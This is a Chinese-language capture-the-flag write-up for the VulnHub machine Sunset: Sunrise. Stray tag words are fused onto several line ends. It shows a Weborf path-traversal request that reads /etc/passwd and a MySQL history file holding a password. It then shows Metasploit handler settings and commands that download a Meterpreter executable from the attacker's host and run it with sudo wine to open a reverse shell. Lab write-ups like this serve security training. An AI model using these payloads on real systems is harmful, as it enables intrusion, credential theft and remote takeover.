靶机连接:python
https://www.vulnhub.com/entry/sunset-sunrise,406/mysql
主机扫描:web
端口扫描:sql
HTTP 80 目录枚举未果shell
HTTP 8080windows
Google search :Weborf/0.12.2 exploittcp
https://www.exploit-db.com/exploits/149253d
Exploit: GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
code
成功读取文件,而后咱们尝试读取一些敏感的目录和文件,最后读取MySQL的密码:blog
http://10.10.203.22:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f.mysql_history
尝试使用帐户登陆系统
如何获取用户sunsire的权限,最后经过MySQL的用户信息获取到了密码
接下来进行提权操做
这里使用wine命令
控制端生成payload
msfpc windows 10.10.203.14
python -m SimpleHTTPServer 8888
use exploit/multi/handler
set encoder x86/shikata_ga_nai
set lhost 10.10.203.14
set lport 443
exploit -j
靶机上执行:
wget http://10.10.203.14:8888/windows-meterpreter-staged-reverse-tcp-443.exe
sudo wine windows-meterpreter-staged-reverse-tcp-443.exe
而后控制端就shell上线了
OVER!!!